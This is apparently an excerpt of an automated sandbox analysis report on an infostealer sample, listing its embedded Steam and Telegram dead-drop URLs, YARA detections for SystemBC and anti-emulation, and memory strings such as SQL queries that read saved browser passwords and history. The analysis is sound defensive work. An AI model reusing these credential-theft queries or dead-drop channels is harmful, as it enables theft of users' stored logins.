                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/inventory/
                    Source: bind.aspx.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941b
                    Source: bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941m
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199761128941[1].htm.4.dr | String found in binary or memory: https://store.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://store.steampowered.com/pri
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: bind.aspx.exeString found in binary or memory: https://t.me/iyigunl
                    Source: bind.aspx.exeString found in binary or memory: https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: BKKFHI.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: BKKFHI.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 135.181.31.18:443 -> 192.168.2.7:49709 version: TLS 1.2

                    System Summary

                    Source: bind.aspx.exe, type: SAMPLEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: String function: 003420E8 appears 287 times
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: String function: 0035A11E appears 77 times
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/17@2/3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034EE16 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_0034EE16
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034F237 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,4_2_0034F237
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199761128941[1].htm
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\Users\user~1\AppData\Local\Temp\delays.tmp
                    Source: bind.aspx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT fieldname, value FROM moz_formhistory/4;;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM loginsL7P;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT url FROM urls LIMIT 1000S6);
